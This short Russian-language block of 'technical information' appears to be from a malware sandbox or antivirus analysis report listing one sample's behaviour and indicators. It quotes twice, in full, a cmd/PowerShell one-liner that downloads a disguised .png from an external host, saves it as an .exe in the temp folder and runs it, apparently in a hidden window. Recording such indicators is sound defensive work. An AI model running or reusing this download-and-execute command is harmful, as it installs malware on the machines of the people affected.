Техническая информация
- http://delexdart.com/images/gfjfgklmslifdsfnln.png как %temp%\scsadmin.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://delexdart.com/images/gfjfgklmslifdsfnln.png','%TMP%\scsadmin.exe');Start-process '%TMP%\scsadmin.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1916
- %TEMP%\1165857.cvr
- DNS ASK de###dart.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://delexdart.com/images/gfjfgklmslifdsfnln.png','%TMP%\scsadmin.exe');Start-process '%TMP%\scsadmin.exe';' (со скрытым окном)